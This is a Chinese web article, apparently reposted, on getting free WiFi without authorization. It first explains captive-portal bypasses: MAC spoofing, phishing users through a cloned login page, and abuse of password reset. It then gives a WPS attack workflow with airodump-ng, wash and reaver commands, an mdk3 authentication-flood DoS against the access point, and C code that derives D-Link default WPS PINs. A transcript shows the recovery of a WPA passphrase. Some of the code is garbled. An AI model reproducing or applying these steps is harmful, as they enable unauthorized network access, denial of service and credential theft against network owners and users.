黑客怎么绕过热点验证免费来使用WiFi的

黑客怎么绕过热点验证来免费使用wifi，是很多朋友们比较关心的，针对这些以下业内专家就来告诉大家，希望大家能够认真阅读。

• 方法一：使用MAC地址伪造法。很多时候开放网络的身份验证往往就是通过上网设备的MAC地址连同上网凭证以一起实现的，无线网络安全存在哪些问题?不过由于任何设备的MAC地址都容易进行修改，包括智能手机和笔记本电脑等，也就是这种验证方法根本不是一种强健或者最安全的验证方法;也正是如此，黑客要做的就是进行扫描整个网络以能寻找其他已经连接上该网络的客户端，而实现这种目的的最快方式就是要利用ARP扫描技术，这样就能给提供一种包含所有连接设备的IP地址和MAC地址的完整ARP表;为了能够有效提高查看的速度，黑客也会尝试进行检测这些设备是否能够产生通信流量，当产生有通信流量就要拦截这种流量并查看是否是上网的网络流量;当这些条件都能满足后，就能非常容易通过网络认证门户的身份验证免费的使用wifi了。
• 方法二：使用伪造认证页面方法。黑客使用这种方法就类似钓鱼，当创建一个伪造身份认真页面后就能迫使正常用户登录该页面进行身份验证，然后也就能盗取他们的上网凭证了;毕竟一般开放的wifi网络的所有流量都是一种未经加密的明文数据，这样黑客就能非常方便的进行拦截并篡改网络流量以达到想要做任何事情的目的;可能一些时候认证页面时通过HTTPS进行连接的，但是它们机会所有时候也都会使用同一个定制证书;大家更需要知道的是，黑客为了能够建立一个假的认证门户，往往还会下载原来真正的认证页面，然后进行编辑该门户网站来存储用户输入的上网凭证信息最后就能将信息转发到原始真正的认证页面中来达到身份认证的目的。
• 方法三：利用忘记密码的方法来进行。黑客使用这种方法十分简单，就是抓住带身份验证的wifi热点会在忘记密码时候能提供重置密码进行服务，这种服务往往也是能通过连接者的手机号码来进行实现，需要能够向填入的手机号码上发送相关新密码，甚至很多时候还需通过电子邮件来发送新密码;在这种情况下就会允许连接客户端的TMAP/POP邮件服务器，也就意味能避免使用网络来查看邮箱了。

wifi渗透流程整理

整理了一下工具的使用

1. 流程图

2. 获取bssid和essid

reference：https://www.aircrack-ng.org/documentation.html

3. 探测是否开启wps(Wi-Fi protected setup)

command：

airodump-ng MB,wash -i mon0 -C 

54e.:默认开启wps,54e:默认不开启

当我们为wifi设置了一个复杂的密码时，每次接入一个新的设备都要重复输入这个密码，过程略微繁琐，wps的出现就是为了解决这个问题。

它提供了一个8位纯数字的秘钥，认证成功即可连接wifi。

但是这8位数是分开认证的，先验证前4位,再验证5-7位,所以最多只需要爆破11000-1次即可成功。

少数路由器wps开启与否是由按钮控制，在能物理接触路由器的情况下，可以手动开启。

reference：

http://www.howtogeek.com/176124/wi-fi-protected-setup-wps-is-insecure-heres-why-you-should-disable-it/

4. 探测pin

command：

reaver -i mon0 -b ap_bssid -vv 

(1) ap denial service

当路由器不再响应的时候,可以用DoS攻击让ap拒绝服务,受害者重启路由.

常用的就是authentication flood attack,攻击者可以伪造源MAC地址(基于802.11的报文发送机制)发送authenticate到目标AP,重复发送这种请求,最终会耗尽AP内存导致拒绝服务.

command：

mdk3 a mon0 -a bssid -c 

reference:

• https://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108
• http://tools.kali.org/wireless-attacks/mdk3
• http://xiao106347.blog.163.com/blog/static/215992078201425920197

(2) get password

reference:

• http://tools.kali.org/wireless-attacks/reaver
• http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/
• https://www.pwnieexpress.com/blog/wps-cracking-with-reaver
• http://lifehacker.com/5873407/how-to-crack-a-wi-fi-networks-wpa-password-with-reaver

5. 利用算法漏洞直接获取pin

devttys0站长通过逆向D-link、belkin固件的wps pin生成算法,直接得到默认pin码.

以d-link为例,获取ap bssid,拆分后进行异或、与、移位等操作生成pin,伪c代码如下：

unsigned int generate_default_pin(char *buf) 
{ 
 char *mac; 
 char mac_address[32] = { 0 }; 
 unsigned int oui, nic, pin; 
 
/* Get a pointer to the WAN MAC address */ 
 mac = lockAndGetInfo_log()->wan_mac_address; 
 
/* 
 * Create a local, NULL-terminated copy of the WAN MAC (simplified from 
 * the original code's sprintf/memmove loop). 
 */ 
 sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], 
 mac[1], 
 mac[2], 
 mac[3], 
 mac[4], 
 mac[5], 
 mac[6], 
 mac[7], 
 mac[8], 
 mac[9], 
 mac[10], 
 mac[11]); 
 
/* 
 * Convert the OUI and NIC portions of the MAC address to integer values. 
 * OUI is unused, just need the NIC. 
 */ 
 sscanf(mac_address, "%06X%06X", &oui, &nic); 
 
/* Do some XOR munging of the NIC. */ 
 pin = (nic ^ 0x55AA55); 
 pinpin = pin ^ (((pin & 0x0F) << 4) + 
 ((pin & 0x0F) << 8) + 
 ((pin & 0x0F) << 12) + 
 ((pin & 0x0F) << 16) + 
 ((pin & 0x0F) << 20)); 
 
/* 
 * The largest possible remainder for any value divided by 10,000,000 
 * is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0. 
 */ 
 pinpin = pin % 10000000; 
 
/* The pin needs to be at least 7 digits long */ 
 if(pin < 1000000) 
 { 
 /* 
 * The largest possible remainder for any value divided by 9 is 
 * 8; hence this adds at most 9,000,000 to the pin value, and at 
 * least 1,000,000. This guarantees that the pin will be 7 digits 
 * long, and also means that it won't start with a 0. 
 */ 
 pin += ((pin % 9) * 1000000) + 1000000; 
 } 
 
/* 
 * The final 8 digit pin is the 7 digit value just computed, plus a 
 * checksum digit. Note that in the disassembly, the wps_pin_checksum 
 * function is inlined (it's just the standard WPS checksum implementation). 
 */ 
 pin = ((pin * 10) + wps_pin_checksum(pin)); 
 
sprintf(buf, "%08d", pin); 
 return pin; 
} 
$ sudo airodump-ng mon0 -c 4 
 
CH 4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1 
 
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
 
C0:A0:BB:EF:B3:D6 -13 0 6 0 0 4 54e WPA2 CCMP PSK dlink-B3D6 
 
$ ./pingen C0:A0:BB:EF:B3:D7 # <--- WAN MAC is BSSID+1 
Default Pin: 99767389 
 
$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389 
 
Reaver v1.4 WiFi Protected Setup Attack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> 
 
[+] Waiting for beacon from C0:A0:BB:EF:B3:D6 
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6) 
[+] WPS PIN: '99767389' 
[+] WPA PSK: 'hluig79268' 
[+] AP SSID: 'dlink-B3D6' 

6. 密码相关app被共享

（编辑：威海站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!